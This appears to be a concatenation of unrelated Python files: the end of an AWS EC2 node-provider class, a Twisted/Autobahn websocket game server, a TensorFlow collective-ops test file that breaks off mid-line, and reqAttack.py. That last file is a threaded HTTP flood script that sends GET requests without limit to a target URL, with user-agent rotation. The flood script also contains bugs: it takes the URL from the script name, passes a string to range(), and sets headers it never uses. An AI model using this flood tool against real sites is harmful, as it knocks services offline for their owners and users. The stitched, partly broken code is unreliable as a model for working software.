self.ec2.meta.client.terminate_instances(InstanceIds=spot_ids)
else:
self.ec2.meta.client.terminate_instances(InstanceIds=node_ids)
for node_id in node_ids:
self.tag_cache.pop(node_id, None)
self.tag_cache_pending.pop(node_id, None)
def _get_node(self, node_id):
"""Refresh and get info for this node, updating the cache."""
self.non_terminated_nodes({}) # Side effect: updates cache
if node_id in self.cached_nodes:
return self.cached_nodes[node_id]
# Node not in {pending, running} -- retry with a point query. This
# usually means the node was recently preempted or terminated.
matches = list(self.ec2.instances.filter(InstanceIds=[node_id]))
assert len(matches) == 1, "Invalid instance id {}".format(node_id)
return matches[0]
def _get_cached_node(self, node_id):
"""Return node info from cache if possible, otherwise fetches it."""
if node_id in self.cached_nodes:
return self.cached_nodes[node_id]
return self._get_node(node_id)
def cleanup(self):
self.tag_cache_update_event.set()
self.tag_cache_kill_event.set()
@staticmethod
def bootstrap_config(cluster_config):
return bootstrap_aws(cluster_config)
|
reqAttack.py
|
import requests
import random
import threading
import sys
VERSION='2.0'
url=sys.argv[0]
socket_ip=[]
user_agent=[]
request_counters=0
def user_agents():
user_agent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
user_agent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
user_agent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
def request_attack():
random_agents=random.choice(user_agent)
headers={'User-Agent':random_agents}
requests.get(url)
def send():
for i in range(sys.argv[1]):
get_attack=threading.Thread(target=request_attack)
get_attack.start()
while True:
if threading.active_count() < sys.argv[1]:
get_attack=threading.Thread(target=request_attack)
get_attack.start()
user_agents()
send()
|
websocket.py
|
from pdb import set_trace as T
import numpy as np
from signal import signal, SIGINT
import sys, os, json, pickle, time
import threading
import ray
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from twisted.python import log
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import WebSocketServerFactory, \
WebSocketServerProtocol
from autobahn.twisted.resource import WebSocketResource
class GodswordServerProtocol(WebSocketServerProtocol):
def __init__(self):
super().__init__()
print("Created a server")
self.frame = 0
#"connected" is already used by WSSP
self.sent_environment = False
self.isConnected = False
self.pos = [0, 0]
self.cmd = None
def onOpen(self):
print("Opened connection to server")
def onClose(self, wasClean, code=None, reason=None):
self.isConnected = False
print('Connection closed')
def connectionMade(self):
super().connectionMade()
self.factory.clientConnectionMade(self)
def connectionLost(self, reason):
super().connectionLost(reason)
self.factory.clientConnectionLost(self)
self.sent_environment = False
#Not used without player interaction
def onMessage(self, packet, isBinary):
print("Server packet", packet)
packet = packet.decode()
_, packet = packet.split(';') #Strip header
r, c, cmd = packet.split(' ') #Split camera coords
if len(cmd) == 0 or cmd == '\t':
cmd = None
self.pos = [int(r), int(c)]
self.cmd = cmd
self.isConnected = True
def onConnect(self, request):
print("WebSocket connection request: {}".format(request))
realm = self.factory.realm
self.realm = realm
self.frame += 1
def serverPacket(self):
data = self.realm.packet
return data
def sendUpdate(self, data):
packet = {}
packet['resource'] = data['resource']
packet['player'] = data['player']
packet['npc'] = data['npc']
packet['pos'] = data['pos']
packet['wilderness'] = data['wilderness']
config = data['config']
print('Is Connected? : {}'.format(self.isConnected))
if not self.sent_environment:
packet['map'] = data['environment']
packet['border'] = config.TERRAIN_BORDER
packet['size'] = config.TERRAIN_SIZE
if 'overlay' in data:
packet['overlay'] = data['overlay']
print('SENDING OVERLAY: ', len(packet['overlay']))
packet = json.dumps(packet).encode('utf8')
self.sendMessage(packet, False)
class WSServerFactory(WebSocketServerFactory):
def __init__(self, ip, realm):
super().__init__(ip)
self.realm = realm
self.time = time.time()
self.clients = []
self.pos = [0, 0]
self.cmd = None
self.tickRate = 0.6
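# Target seconds between client updates; update() sleeps off any remaining
# time so packets go out at most once per tickRate interval.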
self.tick = 0
def update(self, packet):
self.tick += 1
uptime = np.round(self.tickRate*self.tick, 1)
delta = time.time() - self.time
print('Wall Clock: ', str(delta)[:5], 'Uptime: ', uptime, ', Tick: ', self.tick)
delta = self.tickRate - delta
if delta > 0:
time.sleep(delta)
self.time = time.time()
for client in self.clients:
client.sendUpdate(packet)
if client.pos is not None:
self.pos = client.pos
self.cmd = client.cmd
return self.pos, self.cmd
def clientConnectionMade(self, client):
self.clients.append(client)
def clientConnectionLost(self, client):
self.clients.remove(client)
class Application:
def __init__(self, realm):
signal(SIGINT, self.kill)
log.startLogging(sys.stdout)
port = 8080
self.factory = WSServerFactory(u'ws://localhost:{}'.format(port), realm)
self.factory.protocol = GodswordServerProtocol
resource = WebSocketResource(self.factory)
root = File(".")
root.putChild(b"ws", resource)
site = Site(root)
reactor.listenTCP(port, site)
def run():
reactor.run(installSignalHandlers=0)
threading.Thread(target=run).start()
def update(self, packet):
return self.factory.update(packet)
def kill(*args):
print("Killed by user")
reactor.stop()
os._exit(0)
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
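# A group of size one is a degenerate case: both all-reduce and all-gather
# should return the input tensor unchanged.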
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key=100,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key=200,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testCollectiveInvalidKey(self, collective_ops, device, communication):
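# An instance key identifies a particular collective within a group; reusing
# the same key for a different collective type (all-gather after all-reduce)
# should be rejected with an InternalError.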
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with self.assertRaisesRegex(
errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
' got type 2 and data_type 1'):
with ops.device(dev0):
collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
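# The subdivisions tests below exercise max_subdivs_per_device: -1 takes the
# default code path (the argument is omitted), while 0 and 16 are passed
# through explicitly.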
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager',
max_subdivs_per_device=[-1, 0, 16]), device_combination))
class AllReduceWithSubdivisionsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication,
max_subdivs_per_device):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
if max_subdivs_per_device == -1:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
else:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication,
max_subdivs_per_device=max_subdivs_per_device)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
@combinations.generate(
combinations.combine(required_physical_gpus=2, mode='eager'))
class XlaTest(test.TestCase, parameterized.TestCase):
def testReduce(self):
device0 = '/device:GPU:0'
device1 = '/device:GPU:1'
group_size = 2
group_key = 100
instance_key = 100
results = []
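# Each device launches the jit-compiled all-reduce from its own thread so
# that the two collective participants can rendezvous concurrently.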
def all_reduce(device):
@def_function.function(jit_compile=True)
def f():
return _collective_ops.all_reduce_v2([1.], group_size, group_key,
instance_key)
with ops.device(device):
results.append(f())
t0 = threading.Thread(target=all_reduce, args=(device0,))
t1 = threading.Thread(target=all_reduce, args=(device1,))
t0.start()
t1.start()
t0.join()
t1.join()
self.assertAllEqual(results, [[2.], [2.]])
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there are no active collective ops. There could be
# exceptions like EOF which we expect users to catch; aborting collective
# ops on every op error would interfere with that workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there are active collective ops at the time of
# an op error. V1 collective ops cannot be cancelled, so an op error may
# leave running collective ops hanging.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there are active collective ops at
# the time of an op error. We rely on cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testCancelDuringParamResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
t1_cancellation_manager = cancellation.CancellationManager()
t2_cancellation_manager = cancellation.CancellationManager()
@def_function.function
def _collective_fn(x):
# Run an assertion to crash one of the two function executions running
# collectives. We explicitly cancel the other in response.
assert_op = check_ops.assert_equal(x, in_tensor)
with ops.control_dependencies([assert_op]):
return collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
collective_concrete = _collective_fn.get_concrete_function(in_tensor)
finish_mu = threading.Lock()
finishes = 0
def _placement_wrapper(device, x, my_cancellation, other_cancellation):
try:
with ops.device(device):
cancelable_collective = my_cancellation.get_cancelable_function(
collective_concrete)
return cancelable_collective(x)
except errors.InvalidArgumentError:
# `assert_equal` failed for this execution of the function. The other
# function would deadlock without cancellation.
other_cancellation.start_cancel()
except errors.CancelledError:
pass
nonlocal finishes
with finish_mu:
finishes += 1
t1 = threading.Thread(
target=_placement_wrapper,
args=(dev0, constant_op.constant([1.]), t1_cancellation_manager,
t2_cancellation_manager))
t2 = threading.Thread(
target=_placement_wrapper,
# Will cause the assertion to fail
args=(dev1, constant_op.constant([2.]), t2_cancellation_manager,
t1_cancellation_manager))
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(finishes, 2)
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
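# Launching both group members succeeds; reporting a group size of 2 while
# launching only one member must trip the timeout instead of hanging.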
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param resolution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
